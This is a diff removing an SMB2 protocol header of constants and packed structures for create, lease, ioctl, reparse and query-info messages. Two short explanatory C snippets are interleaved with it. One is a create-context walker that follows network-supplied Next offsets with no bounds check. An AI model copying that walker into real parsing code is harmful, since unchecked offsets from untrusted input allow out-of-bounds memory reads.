+-#define FILE_ACTION_REMOVED_STREAM              0x00000007
+-#define FILE_ACTION_MODIFIED_STREAM             0x00000008
+-#define FILE_ACTION_REMOVED_BY_DELETE           0x00000009
+-
+-struct smb2_change_notify_req {
+-	struct smb2_hdr hdr;
+-	__le16	StructureSize;
+-	__le16	Flags;
+-	__le32	OutputBufferLength;
+-	__u64	PersistentFileId; /* opaque endianness */
+-	__u64	VolatileFileId; /* opaque endianness */
+-	__le32	CompletionFilter;
+-	__u32	Reserved;
+-} __packed;
+-
+-struct smb2_change_notify_rsp {
+-	struct smb2_hdr hdr;
+-	__le16	StructureSize;  /* Must be 9 */
+-	__le16	OutputBufferOffset;
+-	__le32	OutputBufferLength;
+-	__u8	Buffer[1]; /* array of file notify structs */
+-} __packed;
+-
+-
+-/*
+- * SMB2_CREATE  See MS-SMB2 section 2.2.13
+- */
+-/* Oplock levels */
+-#define SMB2_OPLOCK_LEVEL_NONE		0x00
+-#define SMB2_OPLOCK_LEVEL_II		0x01
+-#define SMB2_OPLOCK_LEVEL_EXCLUSIVE	0x08
+-#define SMB2_OPLOCK_LEVEL_BATCH		0x09
+-#define SMB2_OPLOCK_LEVEL_LEASE		0xFF
+-/* Non-spec internal type */
+-#define SMB2_OPLOCK_LEVEL_NOCHANGE	0x99
+-
+-/* Impersonation Levels. See MS-WPO section 9.7 and MSDN-IMPERS */
+-#define IL_ANONYMOUS		cpu_to_le32(0x00000000)
+-#define IL_IDENTIFICATION	cpu_to_le32(0x00000001)
+-#define IL_IMPERSONATION	cpu_to_le32(0x00000002)
+-#define IL_DELEGATE		cpu_to_le32(0x00000003)
+-
+-/* File Attributes */
+-#define FILE_ATTRIBUTE_READONLY			0x00000001
+-#define FILE_ATTRIBUTE_HIDDEN			0x00000002
+-#define FILE_ATTRIBUTE_SYSTEM			0x00000004
+-#define FILE_ATTRIBUTE_DIRECTORY		0x00000010
+-#define FILE_ATTRIBUTE_ARCHIVE			0x00000020
+-#define FILE_ATTRIBUTE_NORMAL			0x00000080
+-#define FILE_ATTRIBUTE_TEMPORARY		0x00000100
+-#define FILE_ATTRIBUTE_SPARSE_FILE		0x00000200
+-#define FILE_ATTRIBUTE_REPARSE_POINT		0x00000400
+-#define FILE_ATTRIBUTE_COMPRESSED		0x00000800
+-#define FILE_ATTRIBUTE_OFFLINE			0x00001000
+-#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED	0x00002000
+-#define FILE_ATTRIBUTE_ENCRYPTED		0x00004000
+-#define FILE_ATTRIBUTE_INTEGRITY_STREAM		0x00008000
+-#define FILE_ATTRIBUTE_NO_SCRUB_DATA		0x00020000
+-#define FILE_ATTRIBUTE__MASK			0x00007FB7
+-
+-#define FILE_ATTRIBUTE_READONLY_LE              cpu_to_le32(0x00000001)
+-#define FILE_ATTRIBUTE_HIDDEN_LE		cpu_to_le32(0x00000002)
+-#define FILE_ATTRIBUTE_SYSTEM_LE		cpu_to_le32(0x00000004)
+-#define FILE_ATTRIBUTE_DIRECTORY_LE		cpu_to_le32(0x00000010)
+-#define FILE_ATTRIBUTE_ARCHIVE_LE		cpu_to_le32(0x00000020)
+-#define FILE_ATTRIBUTE_NORMAL_LE		cpu_to_le32(0x00000080)
+-#define FILE_ATTRIBUTE_TEMPORARY_LE		cpu_to_le32(0x00000100)
+-#define FILE_ATTRIBUTE_SPARSE_FILE_LE		cpu_to_le32(0x00000200)
+-#define FILE_ATTRIBUTE_REPARSE_POINT_LE		cpu_to_le32(0x00000400)
+-#define FILE_ATTRIBUTE_COMPRESSED_LE		cpu_to_le32(0x00000800)
+-#define FILE_ATTRIBUTE_OFFLINE_LE		cpu_to_le32(0x00001000)
+-#define FILE_ATTRIBUTE_NOT_CONTENT_INDEXED_LE	cpu_to_le32(0x00002000)
+-#define FILE_ATTRIBUTE_ENCRYPTED_LE		cpu_to_le32(0x00004000)
+-#define FILE_ATTRIBUTE_INTEGRITY_STREAM_LE	cpu_to_le32(0x00008000)
+-#define FILE_ATTRIBUTE_NO_SCRUB_DATA_LE		cpu_to_le32(0x00020000)
+-#define FILE_ATTRIBUTE_MASK_LE			cpu_to_le32(0x00007FB7)
+-
+-/* Desired Access Flags */
+-#define FILE_READ_DATA_LE		cpu_to_le32(0x00000001)
+-#define FILE_LIST_DIRECTORY_LE		cpu_to_le32(0x00000001)
+-#define FILE_WRITE_DATA_LE		cpu_to_le32(0x00000002)
+-#define FILE_APPEND_DATA_LE		cpu_to_le32(0x00000004)
+-#define FILE_ADD_SUBDIRECTORY_LE	cpu_to_le32(0x00000004)
+-#define FILE_READ_EA_LE			cpu_to_le32(0x00000008)
+-#define FILE_WRITE_EA_LE		cpu_to_le32(0x00000010)
+-#define FILE_EXECUTE_LE			cpu_to_le32(0x00000020)
+-#define FILE_DELETE_CHILD_LE		cpu_to_le32(0x00000040)
+-#define FILE_READ_ATTRIBUTES_LE		cpu_to_le32(0x00000080)
+-#define FILE_WRITE_ATTRIBUTES_LE	cpu_to_le32(0x00000100)
+-#define FILE_DELETE_LE			cpu_to_le32(0x00010000)
+-#define FILE_READ_CONTROL_LE		cpu_to_le32(0x00020000)
+-#define FILE_WRITE_DAC_LE		cpu_to_le32(0x00040000)
+-#define FILE_WRITE_OWNER_LE		cpu_to_le32(0x00080000)
+-#define FILE_SYNCHRONIZE_LE		cpu_to_le32(0x00100000)
+-#define FILE_ACCESS_SYSTEM_SECURITY_LE	cpu_to_le32(0x01000000)
+-#define FILE_MAXIMAL_ACCESS_LE		cpu_to_le32(0x02000000)
+-#define FILE_GENERIC_ALL_LE		cpu_to_le32(0x10000000)
+-#define FILE_GENERIC_EXECUTE_LE		cpu_to_le32(0x20000000)
+-#define FILE_GENERIC_WRITE_LE		cpu_to_le32(0x40000000)
+-#define FILE_GENERIC_READ_LE		cpu_to_le32(0x80000000)
+-#define DESIRED_ACCESS_MASK             cpu_to_le32(0xF21F01FF)
+-
+-
+-#define FILE_READ_DESIRED_ACCESS_LE     (FILE_READ_DATA_LE        |	\
+-					 FILE_READ_EA_LE          |     \
+-					 FILE_GENERIC_READ_LE)
+-#define FILE_WRITE_DESIRE_ACCESS_LE     (FILE_WRITE_DATA_LE       |	\
+-					 FILE_APPEND_DATA_LE      |	\
+-					 FILE_WRITE_EA_LE         |	\
+-					 FILE_WRITE_ATTRIBUTES_LE |	\
+-					 FILE_GENERIC_WRITE_LE)
+-
+-/* ShareAccess Flags */
+-#define FILE_SHARE_READ_LE		cpu_to_le32(0x00000001)
+-#define FILE_SHARE_WRITE_LE		cpu_to_le32(0x00000002)
+-#define FILE_SHARE_DELETE_LE		cpu_to_le32(0x00000004)
+-#define FILE_SHARE_ALL_LE		cpu_to_le32(0x00000007)
+-
+-/* CreateDisposition Flags */
+-#define FILE_SUPERSEDE_LE		cpu_to_le32(0x00000000)
+-#define FILE_OPEN_LE			cpu_to_le32(0x00000001)
+-#define FILE_CREATE_LE			cpu_to_le32(0x00000002)
+-#define	FILE_OPEN_IF_LE			cpu_to_le32(0x00000003)
+-#define FILE_OVERWRITE_LE		cpu_to_le32(0x00000004)
+-#define FILE_OVERWRITE_IF_LE		cpu_to_le32(0x00000005)
+-#define FILE_CREATE_MASK_LE             cpu_to_le32(0x00000007)
+-
+-#define FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
+-			| FILE_READ_ATTRIBUTES)
+-#define FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-			| FILE_WRITE_EA | FILE_WRITE_ATTRIBUTES)
+-#define FILE_EXEC_RIGHTS (FILE_EXECUTE)
+-
+-/* CreateOptions Flags */
+-#define FILE_DIRECTORY_FILE_LE		cpu_to_le32(0x00000001)
+-/* same as #define CREATE_NOT_FILE_LE	cpu_to_le32(0x00000001) */
+-#define FILE_WRITE_THROUGH_LE		cpu_to_le32(0x00000002)
+-#define FILE_SEQUENTIAL_ONLY_LE		cpu_to_le32(0x00000004)
+-#define FILE_NO_INTERMEDIATE_BUFFERING_LE cpu_to_le32(0x00000008)
+-#define FILE_NON_DIRECTORY_FILE_LE	cpu_to_le32(0x00000040)
+-#define FILE_COMPLETE_IF_OPLOCKED_LE	cpu_to_le32(0x00000100)
+-#define FILE_NO_EA_KNOWLEDGE_LE		cpu_to_le32(0x00000200)
+-#define FILE_RANDOM_ACCESS_LE		cpu_to_le32(0x00000800)
+-#define FILE_DELETE_ON_CLOSE_LE		cpu_to_le32(0x00001000)
+-#define FILE_OPEN_BY_FILE_ID_LE		cpu_to_le32(0x00002000)
+-#define FILE_OPEN_FOR_BACKUP_INTENT_LE	cpu_to_le32(0x00004000)
+-#define FILE_NO_COMPRESSION_LE		cpu_to_le32(0x00008000)
+-#define FILE_OPEN_REPARSE_POINT_LE	cpu_to_le32(0x00200000)
+-#define FILE_OPEN_NO_RECALL_LE		cpu_to_le32(0x00400000)
+-#define CREATE_OPTIONS_MASK_LE          cpu_to_le32(0x00FFFFFF)
+-
+-#define FILE_READ_RIGHTS_LE (FILE_READ_DATA_LE | FILE_READ_EA_LE \
+-			| FILE_READ_ATTRIBUTES_LE)
+-#define FILE_WRITE_RIGHTS_LE (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE \
+-			| FILE_WRITE_EA_LE | FILE_WRITE_ATTRIBUTES_LE)
+-#define FILE_EXEC_RIGHTS_LE (FILE_EXECUTE_LE)
+-
+-/* Create Context Values */
+-#define SMB2_CREATE_EA_BUFFER			"ExtA" /* extended attributes */
+-#define SMB2_CREATE_SD_BUFFER			"SecD" /* security descriptor */
+-#define SMB2_CREATE_DURABLE_HANDLE_REQUEST	"DHnQ"
+-#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT	"DHnC"
+-#define SMB2_CREATE_ALLOCATION_SIZE		"AISi"
+-#define SMB2_CREATE_QUERY_MAXIMAL_ACCESS_REQUEST "MxAc"
+-#define SMB2_CREATE_TIMEWARP_REQUEST		"TWrp"
+-#define SMB2_CREATE_QUERY_ON_DISK_ID		"QFid"
+-#define SMB2_CREATE_REQUEST_LEASE		"RqLs"
+-#define SMB2_CREATE_DURABLE_HANDLE_REQUEST_V2	"DH2Q"
+-#define SMB2_CREATE_DURABLE_HANDLE_RECONNECT_V2	"DH2C"
+-#define SMB2_CREATE_TAG_POSIX		"\x93\xAD\x25\x50\x9C\xB4\x11\xE7\xB4\x23\x83\xDE\x96\x8B\xCD\x7C"
+-#define SMB2_CREATE_APP_INSTANCE_ID	"\x45\xBC\xA6\x6A\xEF\xA7\xF7\x4A\x90\x08\xFA\x46\x2E\x14\x4D\x74"
+-#define SMB2_CREATE_APP_INSTANCE_VERSION "\xB9\x82\xD0\xB7\x3B\x56\x07\x4F\xA0\x7B\x52\x4A\x81\x16\xA0\x10"
+-#define SVHDX_OPEN_DEVICE_CONTEXT	"\x9C\xCB\xCF\x9E\x04\xC1\xE6\x43\x98\x0E\x15\x8D\xA1\xF6\xEC\x83"
+-#define SMB2_CREATE_TAG_AAPL			"AAPL"
+-
+-/* Flag (SMB3 open response) values */
+-#define SMB2_CREATE_FLAG_REPARSEPOINT 0x01
+-
+-struct create_context {
+-	__le32 Next;
+-	__le16 NameOffset;
+-	__le16 NameLength;
+-	__le16 Reserved;
+-	__le16 DataOffset;
+-	__le32 DataLength;
+-	__u8 Buffer[];
+-} __packed;
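
The Next field chains create contexts by byte offset, with zero terminating the chain; an illustrative walker, not taken from this patch:

	static struct create_context *next_create_context(struct create_context *cc)
	{
		u32 next = le32_to_cpu(cc->Next);

		/* Next is the offset from this context to the following one */
		return next ? (struct create_context *)((u8 *)cc + next) : NULL;
	}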
+-
+-struct smb2_create_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 57 */
+-	__u8   SecurityFlags;
+-	__u8   RequestedOplockLevel;
+-	__le32 ImpersonationLevel;
+-	__le64 SmbCreateFlags;
+-	__le64 Reserved;
+-	__le32 DesiredAccess;
+-	__le32 FileAttributes;
+-	__le32 ShareAccess;
+-	__le32 CreateDisposition;
+-	__le32 CreateOptions;
+-	__le16 NameOffset;
+-	__le16 NameLength;
+-	__le32 CreateContextsOffset;
+-	__le32 CreateContextsLength;
+-	__u8   Buffer[];
+-} __packed;
+-
+-struct smb2_create_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize;	/* Must be 89 */
+-	__u8   OplockLevel;
+-	__u8   Flags;  /* 0x01 if reparse point */
+-	__le32 CreateAction;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 AllocationSize;
+-	__le64 EndofFile;
+-	__le32 FileAttributes;
+-	__le32 Reserved2;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 CreateContextsOffset;
+-	__le32 CreateContextsLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct create_posix {
+-	struct create_context ccontext;
+-	__u8    Name[16];
+-	__le32  Mode;
+-	__u32   Reserved;
+-} __packed;
+-
+-#define SMB2_LEASE_NONE_LE			cpu_to_le32(0x00)
+-#define SMB2_LEASE_READ_CACHING_LE		cpu_to_le32(0x01)
+-#define SMB2_LEASE_HANDLE_CACHING_LE		cpu_to_le32(0x02)
+-#define SMB2_LEASE_WRITE_CACHING_LE		cpu_to_le32(0x04)
+-
+-#define SMB2_LEASE_FLAG_BREAK_IN_PROGRESS_LE	cpu_to_le32(0x02)
+-
+-#define SMB2_LEASE_KEY_SIZE			16
+-
+-struct lease_context {
+-	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
+-	__le32 LeaseState;
+-	__le32 LeaseFlags;
+-	__le64 LeaseDuration;
+-} __packed;
+-
+-struct lease_context_v2 {
+-	__u8 LeaseKey[SMB2_LEASE_KEY_SIZE];
+-	__le32 LeaseState;
+-	__le32 LeaseFlags;
+-	__le64 LeaseDuration;
+-	__u8 ParentLeaseKey[SMB2_LEASE_KEY_SIZE];
+-	__le16 Epoch;
+-	__le16 Reserved;
+-} __packed;
+-
+-struct create_lease {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct lease_context lcontext;
+-} __packed;
+-
+-struct create_lease_v2 {
+-	struct create_context ccontext;
+-	__u8   Name[8];
+-	struct lease_context_v2 lcontext;
+-	__u8   Pad[4];
+-} __packed;
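
For illustration only (the helper is hypothetical), a v2 lease context might be filled like this; note the SMB2_LEASE_*_LE state constants above are already little-endian, so they can be OR-ed directly into LeaseState:

	static void init_lease_v2(struct lease_context_v2 *lc, const u8 *key,
				  const u8 *parent_key)
	{
		memset(lc, 0, sizeof(*lc));
		memcpy(lc->LeaseKey, key, SMB2_LEASE_KEY_SIZE);
		memcpy(lc->ParentLeaseKey, parent_key, SMB2_LEASE_KEY_SIZE);
		/* request read and handle caching */
		lc->LeaseState = SMB2_LEASE_READ_CACHING_LE |
				 SMB2_LEASE_HANDLE_CACHING_LE;
	}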
+-
+-/* See MS-SMB2 2.2.31 and 2.2.32 */
+-struct smb2_ioctl_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 57 */
+-	__le16 Reserved; /* offset from start of SMB2 header to write data */
+-	__le32 CtlCode;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 InputOffset; /* Reserved MBZ */
+-	__le32 InputCount;
+-	__le32 MaxInputResponse;
+-	__le32 OutputOffset;
+-	__le32 OutputCount;
+-	__le32 MaxOutputResponse;
+-	__le32 Flags;
+-	__le32 Reserved2;
+-	__u8   Buffer[];
+-} __packed;
+-
+-struct smb2_ioctl_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 49 */
+-	__le16 Reserved;
+-	__le32 CtlCode;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__le32 InputOffset; /* Reserved MBZ */
+-	__le32 InputCount;
+-	__le32 OutputOffset;
+-	__le32 OutputCount;
+-	__le32 Flags;
+-	__le32 Reserved2;
+-	__u8   Buffer[];
+-} __packed;
+-
+-/* this goes in the ioctl buffer when doing FSCTL_SET_ZERO_DATA */
+-struct file_zero_data_information {
+-	__le64	FileOffset;
+-	__le64	BeyondFinalZero;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.7 */
+-struct duplicate_extents_to_file {
+-	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
+-	__u64 VolatileFileHandle;
+-	__le64 SourceFileOffset;
+-	__le64 TargetFileOffset;
+-	__le64 ByteCount;  /* Bytes to be copied */
+-} __packed;
+-
+-/* See MS-FSCC 2.3.8 */
+-#define DUPLICATE_EXTENTS_DATA_EX_SOURCE_ATOMIC	0x00000001
+-struct duplicate_extents_to_file_ex {
+-	__u64 PersistentFileHandle; /* source file handle, opaque endianness */
+-	__u64 VolatileFileHandle;
+-	__le64 SourceFileOffset;
+-	__le64 TargetFileOffset;
+-	__le64 ByteCount;  /* Bytes to be copied */
+-	__le32 Flags;
+-	__le32 Reserved;
+-} __packed;
+-
+-
+-/* See MS-FSCC 2.3.20 */
+-struct fsctl_get_integrity_information_rsp {
+-	__le16	ChecksumAlgorithm;
+-	__le16	Reserved;
+-	__le32	Flags;
+-	__le32	ChecksumChunkSizeInBytes;
+-	__le32	ClusterSizeInBytes;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.55 */
+-struct fsctl_query_file_regions_req {
+-	__le64	FileOffset;
+-	__le64	Length;
+-	__le32	DesiredUsage;
+-	__le32	Reserved;
+-} __packed;
+-
+-/* DesiredUsage flags see MS-FSCC 2.3.56.1 */
+-#define FILE_USAGE_INVALID_RANGE	0x00000000
+-#define FILE_USAGE_VALID_CACHED_DATA	0x00000001
+-#define FILE_USAGE_NONCACHED_DATA	0x00000002
+-
+-struct file_region_info {
+-	__le64	FileOffset;
+-	__le64	Length;
+-	__le32	DesiredUsage;
+-	__le32	Reserved;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.56 */
+-struct fsctl_query_file_region_rsp {
+-	__le32 Flags;
+-	__le32 TotalRegionEntryCount;
+-	__le32 RegionEntryCount;
+-	__u32  Reserved;
+-	struct  file_region_info Regions[];
+-} __packed;
+-
+-/* See MS-FSCC 2.3.58 */
+-struct fsctl_query_on_disk_vol_info_rsp {
+-	__le64	DirectoryCount;
+-	__le64	FileCount;
+-	__le16	FsFormatMajVersion;
+-	__le16	FsFormatMinVersion;
+-	__u8	FsFormatName[24];
+-	__le64	FormatTime;
+-	__le64	LastUpdateTime;
+-	__u8	CopyrightInfo[68];
+-	__u8	AbstractInfo[68];
+-	__u8	FormatImplInfo[68];
+-	__u8	LastModifyImplInfo[68];
+-} __packed;
+-
+-/* See MS-FSCC 2.3.73 */
+-struct fsctl_set_integrity_information_req {
+-	__le16	ChecksumAlgorithm;
+-	__le16	Reserved;
+-	__le32	Flags;
+-} __packed;
+-
+-/* See MS-FSCC 2.3.75 */
+-struct fsctl_set_integrity_info_ex_req {
+-	__u8	EnableIntegrity;
+-	__u8	KeepState;
+-	__u16	Reserved;
+-	__le32	Flags;
+-	__u8	Version;
+-	__u8	Reserved2[7];
+-} __packed;
+-
+-/* Integrity ChecksumAlgorithm choices for above */
+-#define	CHECKSUM_TYPE_NONE	0x0000
+-#define	CHECKSUM_TYPE_CRC64	0x0002
+-#define	CHECKSUM_TYPE_UNCHANGED	0xFFFF	/* set only */
+-
+-/* Integrity flags for above */
+-#define FSCTL_INTEGRITY_FLAG_CHECKSUM_ENFORCEMENT_OFF	0x00000001
+-
+-/* Reparse structures - see MS-FSCC 2.1.2 */
+-
+-/* struct fsctl_reparse_info_req is empty, only response structs (see below) */
+-struct reparse_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__u8	DataBuffer[]; /* Variable Length */
+-} __packed;
+-
+-struct reparse_guid_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__u8	ReparseGuid[16];
+-	__u8	DataBuffer[]; /* Variable Length */
+-} __packed;
+-
+-struct reparse_mount_point_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le16	SubstituteNameOffset;
+-	__le16	SubstituteNameLength;
+-	__le16	PrintNameOffset;
+-	__le16	PrintNameLength;
+-	__u8	PathBuffer[]; /* Variable Length */
+-} __packed;
+-
+-#define SYMLINK_FLAG_RELATIVE 0x00000001
+-
+-struct reparse_symlink_data_buffer {
+-	__le32	ReparseTag;
+-	__le16	ReparseDataLength;
+-	__u16	Reserved;
+-	__le16	SubstituteNameOffset;
+-	__le16	SubstituteNameLength;
+-	__le16	PrintNameOffset;
+-	__le16	PrintNameLength;
+-	__le32	Flags;
+-	__u8	PathBuffer[]; /* Variable Length */
+-} __packed;
+-
+-/* See MS-FSCC 2.1.2.6 and cifspdu.h for struct reparse_posix_data */
+-
+-struct validate_negotiate_info_req {
+-	__le32 Capabilities;
+-	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
+-	__le16 SecurityMode;
+-	__le16 DialectCount;
+-	__le16 Dialects[4]; /* BB expand this if autonegotiate > 4 dialects */
+-} __packed;
+-
+-struct validate_negotiate_info_rsp {
+-	__le32 Capabilities;
+-	__u8   Guid[SMB2_CLIENT_GUID_SIZE];
+-	__le16 SecurityMode;
+-	__le16 Dialect; /* Dialect in use for the connection */
+-} __packed;
+-
+-
+-/* Possible InfoType values */
+-#define SMB2_O_INFO_FILE	0x01
+-#define SMB2_O_INFO_FILESYSTEM	0x02
+-#define SMB2_O_INFO_SECURITY	0x03
+-#define SMB2_O_INFO_QUOTA	0x04
+-
+-/* SMB2 Query Info see MS-SMB2 (2.2.37) or MS-DTYP */
+-
+-/* List of QUERY INFO levels (those also valid for QUERY_DIR are noted below) */
+-#define FILE_DIRECTORY_INFORMATION	1	/* also for QUERY_DIR */
+-#define FILE_FULL_DIRECTORY_INFORMATION 2	/* also for QUERY_DIR */
+-#define FILE_BOTH_DIRECTORY_INFORMATION 3	/* also for QUERY_DIR */
+-#define FILE_BASIC_INFORMATION		4
+-#define FILE_STANDARD_INFORMATION	5
+-#define FILE_INTERNAL_INFORMATION	6
+-#define FILE_EA_INFORMATION	        7
+-#define FILE_ACCESS_INFORMATION		8
+-#define FILE_NAME_INFORMATION		9
+-#define FILE_RENAME_INFORMATION		10
+-#define FILE_LINK_INFORMATION		11
+-#define FILE_NAMES_INFORMATION		12	/* also for QUERY_DIR */
+-#define FILE_DISPOSITION_INFORMATION	13
+-#define FILE_POSITION_INFORMATION	14
+-#define FILE_FULL_EA_INFORMATION	15
+-#define FILE_MODE_INFORMATION		16
+-#define FILE_ALIGNMENT_INFORMATION	17
+-#define FILE_ALL_INFORMATION		18
+-#define FILE_ALLOCATION_INFORMATION	19
+-#define FILE_END_OF_FILE_INFORMATION	20
+-#define FILE_ALTERNATE_NAME_INFORMATION 21
+-#define FILE_STREAM_INFORMATION		22
+-#define FILE_PIPE_INFORMATION		23
+-#define FILE_PIPE_LOCAL_INFORMATION	24
+-#define FILE_PIPE_REMOTE_INFORMATION	25
+-#define FILE_MAILSLOT_QUERY_INFORMATION 26
+-#define FILE_MAILSLOT_SET_INFORMATION	27
+-#define FILE_COMPRESSION_INFORMATION	28
+-#define FILE_OBJECT_ID_INFORMATION	29
+-/* Number 30 not defined in documents */
+-#define FILE_MOVE_CLUSTER_INFORMATION	31
+-#define FILE_QUOTA_INFORMATION		32
+-#define FILE_REPARSE_POINT_INFORMATION	33
+-#define FILE_NETWORK_OPEN_INFORMATION	34
+-#define FILE_ATTRIBUTE_TAG_INFORMATION	35
+-#define FILE_TRACKING_INFORMATION	36
+-#define FILEID_BOTH_DIRECTORY_INFORMATION 37	/* also for QUERY_DIR */
+-#define FILEID_FULL_DIRECTORY_INFORMATION 38	/* also for QUERY_DIR */
+-#define FILE_VALID_DATA_LENGTH_INFORMATION 39
+-#define FILE_SHORT_NAME_INFORMATION	40
+-#define FILE_SFIO_RESERVE_INFORMATION	44
+-#define FILE_SFIO_VOLUME_INFORMATION	45
+-#define FILE_HARD_LINK_INFORMATION	46
+-#define FILE_NORMALIZED_NAME_INFORMATION 48
+-#define FILEID_GLOBAL_TX_DIRECTORY_INFORMATION 50
+-#define FILE_STANDARD_LINK_INFORMATION	54
+-#define FILE_ID_INFORMATION		59
+-#define FILE_ID_EXTD_DIRECTORY_INFORMATION 60	/* also for QUERY_DIR */
+-/* Used for Query Info and Find File POSIX Info for SMB3.1.1 and SMB1 */
+-#define SMB_FIND_FILE_POSIX_INFO	0x064
+-
+-/* Security info type additionalinfo flags. */
+-#define OWNER_SECINFO   0x00000001
+-#define GROUP_SECINFO   0x00000002
+-#define DACL_SECINFO   0x00000004
+-#define SACL_SECINFO   0x00000008
+-#define LABEL_SECINFO   0x00000010
+-#define ATTRIBUTE_SECINFO   0x00000020
+-#define SCOPE_SECINFO   0x00000040
+-#define BACKUP_SECINFO   0x00010000
+-#define UNPROTECTED_SACL_SECINFO   0x10000000
+-#define UNPROTECTED_DACL_SECINFO   0x20000000
+-#define PROTECTED_SACL_SECINFO   0x40000000
+-#define PROTECTED_DACL_SECINFO   0x80000000
+-
+-/* Flags used for FileFullEAinfo */
+-#define SL_RESTART_SCAN		0x00000001
+-#define SL_RETURN_SINGLE_ENTRY	0x00000002
+-#define SL_INDEX_SPECIFIED	0x00000004
+-
+-struct smb2_query_info_req {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 41 */
+-	__u8   InfoType;
+-	__u8   FileInfoClass;
+-	__le32 OutputBufferLength;
+-	__le16 InputBufferOffset;
+-	__u16  Reserved;
+-	__le32 InputBufferLength;
+-	__le32 AdditionalInformation;
+-	__le32 Flags;
+-	__u64  PersistentFileId;
+-	__u64  VolatileFileId;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-struct smb2_query_info_rsp {
+-	struct smb2_hdr hdr;
+-	__le16 StructureSize; /* Must be 9 */
+-	__le16 OutputBufferOffset;
+-	__le32 OutputBufferLength;
+-	__u8   Buffer[1];
+-} __packed;
+-
+-/*
+- *	PDU query infolevel structure definitions
+- */
+-
+-/* See MS-FSCC 2.3.52 */
+-struct file_allocated_range_buffer {
+-	__le64	file_offset;
+-	__le64	length;
+-} __packed;
+-
+-struct smb2_file_internal_info {
+-	__le64 IndexNumber;
+-} __packed; /* level 6 Query */
+-
+-struct smb2_file_rename_info { /* encoding of request for level 10 */
+-	__u8   ReplaceIfExists; /* 1 = replace existing target with new */
+-				/* 0 = fail if target already exists */
+-	__u8   Reserved[7];
+-	__u64  RootDirectory;  /* MBZ for network operations (spec says so, but why?) */
+-	__le32 FileNameLength;
+-	char   FileName[];     /* New name to be assigned */
+-	/* padding - overall struct size must be >= 24 so filename + pad >= 6 */
+-} __packed; /* level 10 Set */
+-
+-struct smb2_file_link_info { /* encoding of request for level 11 */
+-	__u8   ReplaceIfExists; /* 1 = replace existing link with new */
+-				/* 0 = fail if link already exists */
+-	__u8   Reserved[7];
+-	__u64  RootDirectory;  /* MBZ for network operations (spec says so, but why?) */
+-	__le32 FileNameLength;
+-	char   FileName[];     /* Name to be assigned to new link */
+-} __packed; /* level 11 Set */
+-
+-/*
+- * This level 18 struct, though it shares a name with the cifs level 0x107
+- * struct, is different: level 0x107 has an extra u64 between AccessFlags
+- * and CurrentByteOffset.
+- */
+-struct smb2_file_all_info { /* data block encoding of response to level 18 */
+-	__le64 CreationTime;	/* Beginning of FILE_BASIC_INFO equivalent */
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le32 Attributes;
+-	__u32  Pad1;		/* End of FILE_BASIC_INFO equivalent */
+-	__le64 AllocationSize;	/* Beginning of FILE_STANDARD_INFO equivalent */
+-	__le64 EndOfFile;	/* size, i.e. offset to first free byte in file */
+-	__le32 NumberOfLinks;	/* hard links */
+-	__u8   DeletePending;
+-	__u8   Directory;
+-	__u16  Pad2;		/* End of FILE_STANDARD_INFO equivalent */
+-	__le64 IndexNumber;
+-	__le32 EASize;
+-	__le32 AccessFlags;
+-	__le64 CurrentByteOffset;
+-	__le32 Mode;
+-	__le32 AlignmentRequirement;
+-	__le32 FileNameLength;
+-	char   FileName[1];
+-} __packed; /* level 18 Query */
+-
+-struct smb2_file_eof_info { /* encoding of request for level 10 */
+-	__le64 EndOfFile; /* new end of file value */
+-} __packed; /* level 20 Set */
+-
+-/* Level 100 query info */
+-struct smb311_posix_qinfo {
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 DosAttributes;
+-	__le64 Inode;
+-	__le32 DeviceId;
+-	__le32 Zero;
+-	/* beginning of POSIX Create Context Response */
+-	__le32 HardLinks;
+-	__le32 ReparseTag;
+-	__le32 Mode;
+-	u8     Sids[];
+-	/*
+-	 * var sized owner SID
+-	 * var sized group SID
+-	 * le32 filenamelength
+-	 * u8  filename[]
+-	 */
+-} __packed;
+-
+-/* File System Information Classes */
+-#define FS_VOLUME_INFORMATION		1 /* Query */
+-#define FS_LABEL_INFORMATION		2 /* Set */
+-#define FS_SIZE_INFORMATION		3 /* Query */
+-#define FS_DEVICE_INFORMATION		4 /* Query */
+-#define FS_ATTRIBUTE_INFORMATION	5 /* Query */
+-#define FS_CONTROL_INFORMATION		6 /* Query, Set */
+-#define FS_FULL_SIZE_INFORMATION	7 /* Query */
+-#define FS_OBJECT_ID_INFORMATION	8 /* Query, Set */
+-#define FS_DRIVER_PATH_INFORMATION	9 /* Query */
+-#define FS_SECTOR_SIZE_INFORMATION	11 /* SMB3 or later. Query */
+-#define FS_POSIX_INFORMATION		100 /* SMB3.1.1 POSIX. Query */
